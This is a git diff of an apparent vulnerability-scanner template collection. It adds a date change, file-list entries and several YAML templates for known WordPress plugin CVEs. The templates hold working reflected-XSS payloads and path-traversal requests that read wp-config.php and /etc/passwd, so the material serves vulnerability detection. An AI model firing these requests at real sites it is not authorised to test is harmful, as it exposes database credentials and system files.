diff --git a/date.txt b/date.txt index eba8e1cb78..19047096d8 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241124 +20241125 diff --git a/poc.txt b/poc.txt index dfd7739ee0..5bb1b30042 100644 --- a/poc.txt +++ b/poc.txt @@ -8918,6 +8918,7 @@ ./poc/cve/CVE-2011-4803.yaml ./poc/cve/CVE-2011-4804.yaml ./poc/cve/CVE-2011-4926-1779d9229b83a1399466ae14361bbefb.yaml +./poc/cve/CVE-2011-4926-2088.yaml ./poc/cve/CVE-2011-4926-2091.yaml ./poc/cve/CVE-2011-4926.yaml ./poc/cve/CVE-2011-4955-2c9bc7dc49f1d6049f053f437b9d7049.yaml @@ -9142,6 +9143,7 @@ ./poc/cve/CVE-2012-4272-be8ad5d2a33e00e145c6c6d44c6091d7.yaml ./poc/cve/CVE-2012-4272.yaml ./poc/cve/CVE-2012-4273-2194.yaml +./poc/cve/CVE-2012-4273-2198.yaml ./poc/cve/CVE-2012-4273-60f2c9c88ca63cf1daa993ad4a08d418.yaml ./poc/cve/CVE-2012-4273.yaml ./poc/cve/CVE-2012-4283-24608d891088820adef824dd0016f4fe.yaml @@ -9399,6 +9401,7 @@ ./poc/cve/CVE-2013-2251-8.yaml ./poc/cve/CVE-2013-2251-9.yaml ./poc/cve/CVE-2013-2251.yaml +./poc/cve/CVE-2013-2287-2243.yaml ./poc/cve/CVE-2013-2287-35fa1e30cd7c85480f6643f78205d60b.yaml ./poc/cve/CVE-2013-2287.yaml ./poc/cve/CVE-2013-2501-f5721b91d8780e1babce9661c23cb532.yaml @@ -9946,6 +9949,7 @@ ./poc/cve/CVE-2014-4548.yaml ./poc/cve/CVE-2014-4549-4415191f19cc09b59219e8dec440ebce.yaml ./poc/cve/CVE-2014-4549.yaml +./poc/cve/CVE-2014-4550-2366.yaml ./poc/cve/CVE-2014-4550-7c5b0f3fc5ba45d02029313feb89dfd7.yaml ./poc/cve/CVE-2014-4550.yaml ./poc/cve/CVE-2014-4551-fd5903aa8b5d2c8b2e658051772058fb.yaml @@ -9963,6 +9967,7 @@ ./poc/cve/CVE-2014-4557-c1cd3dc0f8c7505011ebb9ea3d2cab3a.yaml ./poc/cve/CVE-2014-4557.yaml ./poc/cve/CVE-2014-4558-2369.yaml +./poc/cve/CVE-2014-4558-2371.yaml ./poc/cve/CVE-2014-4558-b4acb8ab63209afc70dba18fa8c3e92f.yaml ./poc/cve/CVE-2014-4558.yaml ./poc/cve/CVE-2014-4559-9367e2b825cbd0bc30c4c1c6a5fee59b.yaml @@ -10295,6 +10300,7 @@ ./poc/cve/CVE-2014-8758.yaml ./poc/cve/CVE-2014-8799-2411.yaml ./poc/cve/CVE-2014-8799-2412.yaml +./poc/cve/CVE-2014-8799-2414.yaml ./poc/cve/CVE-2014-8799-28679161182c43e15921a9681ad9e065.yaml ./poc/cve/CVE-2014-8799.yaml ./poc/cve/CVE-2014-8800-e90fc4b3eb188635877b57fa907cc509.yaml @@ -10347,6 +10353,7 @@ ./poc/cve/CVE-2014-9038.yaml ./poc/cve/CVE-2014-9039-e36ead55dcc8029f1208afc5fd967940.yaml ./poc/cve/CVE-2014-9039.yaml +./poc/cve/CVE-2014-9094-2420.yaml ./poc/cve/CVE-2014-9094-33981699600bd7688fa76839ea64eb69.yaml ./poc/cve/CVE-2014-9094.yaml ./poc/cve/CVE-2014-9097-185f364a811c7ac717748c28afbba129.yaml @@ -10450,6 +10457,7 @@ ./poc/cve/CVE-2014-9442.yaml ./poc/cve/CVE-2014-9443-dce5b982688e425f6d11320686ce785d.yaml ./poc/cve/CVE-2014-9443.yaml +./poc/cve/CVE-2014-9444-2424.yaml ./poc/cve/CVE-2014-9444-70756cf68124cd9397587d06f0bb1382.yaml ./poc/cve/CVE-2014-9444.yaml ./poc/cve/CVE-2014-9453-ac9a7b71996c85009b2a2944312fb316.yaml @@ -10524,6 +10532,7 @@ ./poc/cve/CVE-2015-1000010.yaml ./poc/cve/CVE-2015-1000011-6ef8738040302a74ae4f4262e6a4cba3.yaml ./poc/cve/CVE-2015-1000011.yaml +./poc/cve/CVE-2015-1000012-2460.yaml ./poc/cve/CVE-2015-1000012-bd172eb0a5f5b4fee2b93533e1882477.yaml ./poc/cve/CVE-2015-1000012.yaml ./poc/cve/CVE-2015-1000013-c88ce724ce8bc15e25be894a573aacd0.yaml @@ -10835,6 +10844,7 @@ ./poc/cve/CVE-2015-4414-1b834b9e165140b4664cc5f2b49ee153.yaml ./poc/cve/CVE-2015-4414-2527.yaml ./poc/cve/CVE-2015-4414-2530.yaml +./poc/cve/CVE-2015-4414-2532.yaml ./poc/cve/CVE-2015-4414.yaml ./poc/cve/CVE-2015-4455-7d9a49758ec4a0e1bba306ea632621c1.yaml ./poc/cve/CVE-2015-4455.yaml @@ -10875,6 +10885,7 @@ ./poc/cve/CVE-2015-5308.yaml ./poc/cve/CVE-2015-5354.yaml ./poc/cve/CVE-2015-5461-2555.yaml +./poc/cve/CVE-2015-5461-2556.yaml ./poc/cve/CVE-2015-5461-635af6cd7a9be34e7f0bba5b4ee195e3.yaml ./poc/cve/CVE-2015-5461.yaml ./poc/cve/CVE-2015-5468-01b19b33d509430527fe10d5febf823f.yaml @@ -11401,6 +11412,7 @@ ./poc/cve/CVE-2015-9477.yaml ./poc/cve/CVE-2015-9479-610c1b0820a34b426f46a24294b86cf7.yaml ./poc/cve/CVE-2015-9479.yaml +./poc/cve/CVE-2015-9480-2630.yaml ./poc/cve/CVE-2015-9480-2632.yaml ./poc/cve/CVE-2015-9480-2633.yaml ./poc/cve/CVE-2015-9480-46b5d463ae28dd7308d897e49636d523.yaml @@ -11566,6 +11578,7 @@ ./poc/cve/CVE-2016-1000134-f4029376afda7fca93cc3ed29f8a800b.yaml ./poc/cve/CVE-2016-1000134.yaml ./poc/cve/CVE-2016-1000135-2683.yaml +./poc/cve/CVE-2016-1000135-2684.yaml ./poc/cve/CVE-2016-1000135-2685.yaml ./poc/cve/CVE-2016-1000135-953ff551adbc4893b237af8ca2f3090a.yaml ./poc/cve/CVE-2016-1000135.yaml @@ -11595,6 +11608,7 @@ ./poc/cve/CVE-2016-1000145-193dc216a6cfc62aea217a5dbfd96a13.yaml ./poc/cve/CVE-2016-1000145.yaml ./poc/cve/CVE-2016-1000146-266572fbe2cd7d8682ed9b6914e1f37d.yaml +./poc/cve/CVE-2016-1000146-2721.yaml ./poc/cve/CVE-2016-1000146.yaml ./poc/cve/CVE-2016-1000147-b5480a75c33424482b37a792f6029d2b.yaml ./poc/cve/CVE-2016-1000147.yaml @@ -11602,6 +11616,7 @@ ./poc/cve/CVE-2016-1000148-b06fb90961e87acbee5aeb0d78acee1a.yaml ./poc/cve/CVE-2016-1000148.yaml ./poc/cve/CVE-2016-1000149-2727.yaml +./poc/cve/CVE-2016-1000149-2728.yaml ./poc/cve/CVE-2016-1000149-c94391e68202ff41e65065899fd10200.yaml ./poc/cve/CVE-2016-1000149.yaml ./poc/cve/CVE-2016-1000150-39618c5c04a015f55cb99da607cb046a.yaml @@ -12290,6 +12305,7 @@ ./poc/cve/CVE-2017-16955-54b2c5bde330d2dc4614c1cb299f671b.yaml ./poc/cve/CVE-2017-16955.yaml ./poc/cve/CVE-2017-17043-08130ba3bd49cd34b98615982fe7f7a9.yaml +./poc/cve/CVE-2017-17043-2975.yaml ./poc/cve/CVE-2017-17043.yaml ./poc/cve/CVE-2017-17058.yaml ./poc/cve/CVE-2017-17059-2980.yaml @@ -12497,6 +12513,7 @@ ./poc/cve/CVE-2017-18534.yaml ./poc/cve/CVE-2017-18535-a6694da2ffada233390e8f1c5eb8b4ec.yaml ./poc/cve/CVE-2017-18535.yaml +./poc/cve/CVE-2017-18536-2993.yaml ./poc/cve/CVE-2017-18536-2995.yaml ./poc/cve/CVE-2017-18536-3cd05e19af62aad71cfdb87f03a9d489.yaml ./poc/cve/CVE-2017-18536.yaml @@ -13237,6 +13254,7 @@ ./poc/cve/CVE-2018-18019-b8803a49ed7728d2fbd8e6e96310ef1c.yaml ./poc/cve/CVE-2018-18019.yaml ./poc/cve/CVE-2018-18069-1a2e60d8b8511029783b8707140ec2ae.yaml +./poc/cve/CVE-2018-18069-3426.yaml ./poc/cve/CVE-2018-18069.yaml ./poc/cve/CVE-2018-18264 (copy 2).yaml ./poc/cve/CVE-2018-18264.yaml @@ -13452,6 +13470,7 @@ ./poc/cve/CVE-2018-3714.yaml ./poc/cve/CVE-2018-3760 2.yaml ./poc/cve/CVE-2018-3760.yaml +./poc/cve/CVE-2018-3810-3554.yaml ./poc/cve/CVE-2018-3810-3555.yaml ./poc/cve/CVE-2018-3810-6de071448d5adb9d4c6352281eb7005f.yaml ./poc/cve/CVE-2018-3810.yaml @@ -13622,6 +13641,7 @@ ./poc/cve/CVE-2018-7282.yaml ./poc/cve/CVE-2018-7314.yaml ./poc/cve/CVE-2018-7422-3594.yaml +./poc/cve/CVE-2018-7422-3595.yaml ./poc/cve/CVE-2018-7422-364c9e725b8200c8eda6850a76fb8265.yaml ./poc/cve/CVE-2018-7422.yaml ./poc/cve/CVE-2018-7433-1b1397ee1b9bed1e6459522b55fb6873.yaml @@ -13648,6 +13668,7 @@ ./poc/cve/CVE-2018-8711-1c1be366dda4b16c419a1b2f488fef83.yaml ./poc/cve/CVE-2018-8711.yaml ./poc/cve/CVE-2018-8715.yaml +./poc/cve/CVE-2018-8719-3640.yaml ./poc/cve/CVE-2018-8719-57c7d5d74ce266cc72c2eea523301fe2.yaml ./poc/cve/CVE-2018-8719.yaml ./poc/cve/CVE-2018-8727.yaml @@ -13662,6 +13683,7 @@ ./poc/cve/CVE-2018-9035-45611aeb7dd4380e1502ef5f2cbc7cd1.yaml ./poc/cve/CVE-2018-9035.yaml ./poc/cve/CVE-2018-9118-3651.yaml +./poc/cve/CVE-2018-9118-3654.yaml ./poc/cve/CVE-2018-9118-814871eb95f10c4230a142de91514698.yaml ./poc/cve/CVE-2018-9118.yaml ./poc/cve/CVE-2018-9126 (copy 2).yaml @@ -13885,6 +13907,7 @@ ./poc/cve/CVE-2019-14467-6f88be84c47348e27dc9d2b4c038fb82.yaml ./poc/cve/CVE-2019-14467.yaml ./poc/cve/CVE-2019-14470-3851.yaml +./poc/cve/CVE-2019-14470-3854.yaml ./poc/cve/CVE-2019-14470-3dc13a2b063ab16efc87bedddb70c896.yaml ./poc/cve/CVE-2019-14470.yaml ./poc/cve/CVE-2019-14530.yaml @@ -14152,6 +14175,7 @@ ./poc/cve/CVE-2019-15873-4b7862973219e898887e506d1d927ff2.yaml ./poc/cve/CVE-2019-15873.yaml ./poc/cve/CVE-2019-15889-3902.yaml +./poc/cve/CVE-2019-15889-3905.yaml ./poc/cve/CVE-2019-15889-805609e33a2b16f4cfd3fb9e1254d2ee.yaml ./poc/cve/CVE-2019-15889.yaml ./poc/cve/CVE-2019-15895-39cd0e7acf87f597851594983c8694c9.yaml @@ -14226,6 +14250,7 @@ ./poc/cve/CVE-2019-16523.yaml ./poc/cve/CVE-2019-16524-84cb9e4e90c3852a6688ba8b5396f562.yaml ./poc/cve/CVE-2019-16524.yaml +./poc/cve/CVE-2019-16525-3935.yaml ./poc/cve/CVE-2019-16525-3937.yaml ./poc/cve/CVE-2019-16525-5107e273cedaca507bc480c64fa321aa.yaml ./poc/cve/CVE-2019-16525.yaml @@ -14579,6 +14604,7 @@ ./poc/cve/CVE-2019-6340.yaml ./poc/cve/CVE-2019-6703-cfca9683c7d716d8ddd45ba519e7e7eb.yaml ./poc/cve/CVE-2019-6703.yaml +./poc/cve/CVE-2019-6715-4184.yaml ./poc/cve/CVE-2019-6715-4188.yaml ./poc/cve/CVE-2019-6715-b175b5b29c7b5153a9a4b1d22998677b.yaml ./poc/cve/CVE-2019-6715.yaml @@ -14895,6 +14921,7 @@ ./poc/cve/CVE-2020-13693-9f6548e1a65edc92b22b1e7e4aeb85a1.yaml ./poc/cve/CVE-2020-13693.yaml ./poc/cve/CVE-2020-13700-4508.yaml +./poc/cve/CVE-2020-13700-4510.yaml ./poc/cve/CVE-2020-13700-82316cdb4427a73e8b697e5d1cdfa14a.yaml ./poc/cve/CVE-2020-13700.yaml ./poc/cve/CVE-2020-13764-d4a7f0d1589667d32cbdcbb9bdf615de.yaml @@ -15001,6 +15028,7 @@ ./poc/cve/CVE-2020-16846.yaml ./poc/cve/CVE-2020-16920.yaml ./poc/cve/CVE-2020-16952.yaml +./poc/cve/CVE-2020-17362-4655.yaml ./poc/cve/CVE-2020-17362-4659.yaml ./poc/cve/CVE-2020-17362-b8d1258d5e487d3809196efa7cebb656.yaml ./poc/cve/CVE-2020-17362.yaml @@ -15111,6 +15139,7 @@ ./poc/cve/CVE-2020-24148.yaml ./poc/cve/CVE-2020-24149-f17b476af9729c706149033214bc1201.yaml ./poc/cve/CVE-2020-24149.yaml +./poc/cve/CVE-2020-24186-4794.yaml ./poc/cve/CVE-2020-24186-e802709dd363f61b6f07669be7eb580d.yaml ./poc/cve/CVE-2020-24186.yaml ./poc/cve/CVE-2020-24223 2.yaml @@ -15284,6 +15313,7 @@ ./poc/cve/CVE-2020-29304.yaml ./poc/cve/CVE-2020-29395-16ac2206026b33902232895de1707cd7.yaml ./poc/cve/CVE-2020-29395-5002.yaml +./poc/cve/CVE-2020-29395-5006.yaml ./poc/cve/CVE-2020-29395.yaml ./poc/cve/CVE-2020-29453 (copy 1).yaml ./poc/cve/CVE-2020-29453-1.yaml @@ -15817,6 +15847,7 @@ ./poc/cve/CVE-2020-9019-f0f978cf1482283f87c7ef8acdd7c45e.yaml ./poc/cve/CVE-2020-9019.yaml ./poc/cve/CVE-2020-9036.yaml +./poc/cve/CVE-2020-9043(1).yaml ./poc/cve/CVE-2020-9043-71853e1d2641cd1f7430c643c9db64bd.yaml ./poc/cve/CVE-2020-9043.yaml ./poc/cve/CVE-2020-9047.yaml @@ -16174,6 +16205,7 @@ ./poc/cve/CVE-2021-24209-a6ed914616e6d20250ae103154cdd5f3.yaml ./poc/cve/CVE-2021-24209.yaml ./poc/cve/CVE-2021-24210-3057223241f22f26c976b13abf36d9b1.yaml +./poc/cve/CVE-2021-24210-5640.yaml ./poc/cve/CVE-2021-24210.yaml ./poc/cve/CVE-2021-24211-ed3d8c37e9725aabcf188699a130ab05.yaml ./poc/cve/CVE-2021-24211.yaml @@ -16351,6 +16383,7 @@ ./poc/cve/CVE-2021-24289.yaml ./poc/cve/CVE-2021-24290-e8fd43664cd0b029c9c174584ea48e8d.yaml ./poc/cve/CVE-2021-24290.yaml +./poc/cve/CVE-2021-24291-5683.yaml ./poc/cve/CVE-2021-24291-eefec2c5385df5bdf65949b7b59e5ce1.yaml ./poc/cve/CVE-2021-24291.yaml ./poc/cve/CVE-2021-24292-9aed2fbe384cc85f25bd56e5ae692669.yaml @@ -16404,6 +16437,7 @@ ./poc/cve/CVE-2021-24315-47848231844c1b4bbef5562929c4aefc.yaml ./poc/cve/CVE-2021-24315.yaml ./poc/cve/CVE-2021-24316-2813a1d60b58f7217403cc4e686b51f8.yaml +./poc/cve/CVE-2021-24316-5691.yaml ./poc/cve/CVE-2021-24316-d168751b238f28a1a68263abeb6f4c7a.yaml ./poc/cve/CVE-2021-24316.yaml ./poc/cve/CVE-2021-24317-dfd9bd55d8a4d4cc599169686f7f08ba.yaml @@ -16553,6 +16587,7 @@ ./poc/cve/CVE-2021-24386.yaml ./poc/cve/CVE-2021-24387-46cf78e6de50515d5a8ff1b6a59818c9.yaml ./poc/cve/CVE-2021-24387-5722.yaml +./poc/cve/CVE-2021-24387-5724.yaml ./poc/cve/CVE-2021-24387.yaml ./poc/cve/CVE-2021-24388-14614859113ffb7afd9ac82859c04eb2.yaml ./poc/cve/CVE-2021-24388.yaml @@ -16593,6 +16628,7 @@ ./poc/cve/CVE-2021-24405-6c00b40f33737e8c3cb00795fd2348c7.yaml ./poc/cve/CVE-2021-24405.yaml ./poc/cve/CVE-2021-24406-5734.yaml +./poc/cve/CVE-2021-24406-5736.yaml ./poc/cve/CVE-2021-24406-de317cf69ce111059aaeb0832a7f4981.yaml ./poc/cve/CVE-2021-24406.yaml ./poc/cve/CVE-2021-24407-21ab28420b696cd20235651481057cca.yaml @@ -16751,6 +16787,7 @@ ./poc/cve/CVE-2021-24486.yaml ./poc/cve/CVE-2021-24487-179b005e9af084eab7ca073477549619.yaml ./poc/cve/CVE-2021-24487.yaml +./poc/cve/CVE-2021-24488(1).yaml ./poc/cve/CVE-2021-24488-75b39b08cbf876cfb9e54e815d6a31c8.yaml ./poc/cve/CVE-2021-24488.yaml ./poc/cve/CVE-2021-24489-5f15d3969b9b6929e23eb2161431da8d.yaml @@ -17767,6 +17804,7 @@ ./poc/cve/CVE-2021-24995.yaml ./poc/cve/CVE-2021-24996-4d762948c0db5f612fe71d57da2478b3.yaml ./poc/cve/CVE-2021-24996.yaml +./poc/cve/CVE-2021-24997-5782.yaml ./poc/cve/CVE-2021-24997-aff35f57b7fc2809431dfbd3d3bb6272.yaml ./poc/cve/CVE-2021-24997.yaml ./poc/cve/CVE-2021-24998-6a0e16d4236b7def46eb49989ac48b25.yaml @@ -17832,6 +17870,7 @@ ./poc/cve/CVE-2021-25027.yaml ./poc/cve/CVE-2021-25028-5783.yaml ./poc/cve/CVE-2021-25028-5784.yaml +./poc/cve/CVE-2021-25028-5787.yaml ./poc/cve/CVE-2021-25028-6a7346a0d71f3758c4e4d202e954f662.yaml ./poc/cve/CVE-2021-25028.yaml ./poc/cve/CVE-2021-25029-999aea7e010ac04d41f94a121a38cc3f.yaml @@ -18657,6 +18696,7 @@ ./poc/cve/CVE-2021-39311-014c83de95dae039463389351163fcd0.yaml ./poc/cve/CVE-2021-39311.yaml ./poc/cve/CVE-2021-39312-30532d01e391162b738127d965c72c50.yaml +./poc/cve/CVE-2021-39312-6327.yaml ./poc/cve/CVE-2021-39312.yaml ./poc/cve/CVE-2021-39313-ca85c142f0fa3daec9e192abeaf739f6.yaml ./poc/cve/CVE-2021-39313.yaml @@ -19505,6 +19545,7 @@ ./poc/cve/CVE-2022-0649.yaml ./poc/cve/CVE-2022-0651-c9e40242ef33288cd1a708c183c7cada.yaml ./poc/cve/CVE-2022-0651.yaml +./poc/cve/CVE-2022-0653-6638.yaml ./poc/cve/CVE-2022-0653-e0fe444c64b63bc8f08028392ceeb0d0.yaml ./poc/cve/CVE-2022-0653.yaml ./poc/cve/CVE-2022-0656-994a2cef063389fd91a0a80146d87f09.yaml @@ -21042,6 +21083,7 @@ ./poc/cve/CVE-2022-27848-6f237bcdcde0f1e74372ab90414040ae.yaml ./poc/cve/CVE-2022-27848.yaml ./poc/cve/CVE-2022-27849-506fab136540118868e933f9f2f59b67.yaml +./poc/cve/CVE-2022-27849-6740.yaml ./poc/cve/CVE-2022-27849.yaml ./poc/cve/CVE-2022-27850-9949dde1f4f7636a2e09e262eec95ce4.yaml ./poc/cve/CVE-2022-27850.yaml diff --git a/poc/cve/CVE-2011-4926-2088.yaml b/poc/cve/CVE-2011-4926-2088.yaml new file mode 100644 index 0000000000..bbefdb8002 --- /dev/null +++ b/poc/cve/CVE-2011-4926-2088.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2012-4273-2198.yaml b/poc/cve/CVE-2012-4273-2198.yaml new file mode 100644 index 0000000000..bacae8d717 --- /dev/null +++ b/poc/cve/CVE-2012-4273-2198.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2013-2287-2243.yaml b/poc/cve/CVE-2013-2287-2243.yaml new file mode 100644 index 0000000000..53312074c8 --- /dev/null +++ b/poc/cve/CVE-2013-2287-2243.yaml @@ -0,0 +1,37 @@ +id: CVE-2013-2287 + +info: + name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 + - https://www.dognaedis.com/vulns/DGS-SEC-16.html + - http://osvdb.org/90840 + classification: + cve-id: CVE-2013-2287 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/CVE-2014-4550-2366.yaml b/poc/cve/CVE-2014-4550-2366.yaml new file mode 100644 index 0000000000..b632ab76ac --- /dev/null +++ b/poc/cve/CVE-2014-4550-2366.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4550 + +info: + name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4550 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4550 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2014-4558-2371.yaml b/poc/cve/CVE-2014-4558-2371.yaml new file mode 100644 index 0000000000..504a98db1e --- /dev/null +++ b/poc/cve/CVE-2014-4558-2371.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4558 + +info: + name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 + + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4558 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/swipehq–payment–gateway–woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " + + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-8799-2414.yaml b/poc/cve/CVE-2014-8799-2414.yaml new file mode 100644 index 0000000000..2fff64b065 --- /dev/null +++ b/poc/cve/CVE-2014-8799-2414.yaml @@ -0,0 +1,31 @@ +id: CVE-2014-8799 + +info: + name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + reference: + - https://www.exploit-db.com/exploits/35346 + - https://www.cvedetails.com/cve/CVE-2014-8799 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + - "DB_USER" + - "DB_HOST" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-9094-2420.yaml b/poc/cve/CVE-2014-9094-2420.yaml new file mode 100644 index 0000000000..e825e9eb53 --- /dev/null +++ b/poc/cve/CVE-2014-9094-2420.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-9444-2424.yaml b/poc/cve/CVE-2014-9444-2424.yaml new file mode 100644 index 0000000000..4a440d1e5c --- /dev/null +++ b/poc/cve/CVE-2014-9444-2424.yaml @@ -0,0 +1,38 @@ +id: CVE-2014-9444 + +info: + name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting + author: daffainfo + severity: medium + description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability. + reference: + - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 + - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 + - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html + - http://www.securityfocus.com/bid/71808 + classification: + cve-id: CVE-2014-9444 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/CVE-2015-1000012-2460.yaml b/poc/cve/CVE-2015-1000012-2460.yaml new file mode 100644 index 0000000000..97d765e6ff --- /dev/null +++ b/poc/cve/CVE-2015-1000012-2460.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-1000012 + +info: + name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + reference: + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" + + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + part: body + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2015-4414-2532.yaml b/poc/cve/CVE-2015-4414-2532.yaml new file mode 100644 index 0000000000..cda6e987c4 --- /dev/null +++ b/poc/cve/CVE-2015-4414-2532.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-4414 + +info: + name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/37274 + - https://www.cvedetails.com/cve/CVE-2015-4414 + + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - 